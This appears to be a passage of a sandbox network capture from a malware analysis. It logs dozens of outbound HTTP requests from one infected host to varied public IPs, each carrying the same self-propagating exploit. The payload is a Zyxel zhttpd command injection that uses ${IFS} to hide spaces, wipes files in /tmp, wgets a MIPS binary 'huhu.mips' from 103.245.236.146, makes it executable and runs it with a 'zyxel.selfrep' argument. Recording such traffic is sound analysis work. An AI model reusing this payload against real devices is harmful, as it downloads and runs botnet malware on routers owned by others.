                                              Jan 29, 2024 07:03:47.970632076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3847192.168.2.1455104132.233.69.0443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.970679998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3848192.168.2.145980246.191.81.196443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.970716000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3849192.168.2.1445586206.47.115.102443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.970751047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3850192.168.2.1433652193.195.174.151443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.970808983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3851192.168.2.1442646135.67.218.142443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.970839024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3852192.168.2.1458850133.134.226.161443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.970861912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3853192.168.2.1437290112.200.44.203443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.970907927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3854192.168.2.145624678.40.222.116443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.970925093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3855192.168.2.1442566117.50.180.162443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.970962048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3856192.168.2.1449466149.125.45.66443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.970990896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3857192.168.2.1452724131.196.89.94443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.971024990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3858192.168.2.143539635.1.79.12443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.971074104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3859192.168.2.1437448174.54.49.31443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.971106052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3860192.168.2.1437760150.3.164.20443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.971133947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3861192.168.2.1438454181.87.46.254443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.971184969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3862192.168.2.144222084.82.167.178443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.971224070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3863192.168.2.144992889.124.138.250443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.971249104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3864192.168.2.1451344167.239.94.176443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.971311092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3865192.168.2.1460520173.80.172.111443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.971338987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3866192.168.2.1434566140.205.210.249443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.971384048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3867192.168.2.143491437.214.172.73443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.971421003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3868192.168.2.144105487.106.31.251443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.971486092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3869192.168.2.143907813.37.246.113443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.971508980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3870192.168.2.1459854108.39.44.90443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.971537113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3871192.168.2.1455564199.50.136.9443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.971591949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3872192.168.2.143411437.53.111.170443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.971625090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3873192.168.2.1432848200.109.22.158443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.971673012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3874192.168.2.144696213.23.62.243443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.971719027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3875192.168.2.14579202.98.119.140443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.971755028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3876192.168.2.1448334160.88.212.11443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.971781015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3877192.168.2.1451248120.172.30.241443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.971837044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3878192.168.2.1436216222.29.21.192443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.971858978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3879192.168.2.1450826111.97.78.178443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.971910954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3880192.168.2.1454344170.2.110.15443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.971970081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3881192.168.2.143985264.151.103.214443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.971998930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3882192.168.2.145362087.173.2.179443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.972035885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3883192.168.2.144886877.52.16.67443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.972071886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3884192.168.2.144642269.69.146.50443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.972110987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3885192.168.2.1457582198.61.243.196443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.972147942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3886192.168.2.1448128123.220.37.237443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.972183943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3887192.168.2.1447510160.252.168.51443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.972225904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3888192.168.2.1454514137.192.31.43443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.972276926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3889192.168.2.144196048.73.158.143443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.972291946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3890192.168.2.1451766147.122.245.183443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.972321987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3891192.168.2.1436558133.241.82.184443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.972354889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3892192.168.2.144602085.42.104.85443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.972387075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3893192.168.2.1454128221.51.82.202443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.972451925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3894192.168.2.144868042.210.155.148443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.972486019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3895192.168.2.1437288118.31.103.121443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.972547054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3896192.168.2.145684812.7.228.217443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.972589016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3897192.168.2.143695487.173.186.59443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.972637892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3898192.168.2.145684642.64.61.222443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.972670078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3899192.168.2.14545722.51.157.191443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.972701073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3900192.168.2.1460358181.33.164.172443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.972767115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3901192.168.2.144577670.22.224.189443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.972788095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3902192.168.2.1454300102.106.23.9443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.972848892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3903192.168.2.1439990149.59.221.157443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.972886086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3904192.168.2.144509445.105.86.231443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.972940922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3905192.168.2.145553854.31.120.239443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.972978115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3906192.168.2.1458794121.63.180.224443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.973016977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3907192.168.2.1458594101.115.49.141443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.973048925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3908192.168.2.1442870191.97.152.85443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.973086119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3909192.168.2.144869441.237.22.86443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.973120928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3910192.168.2.144139879.150.61.23443
                                              TimestampBytes transferredDirectionData
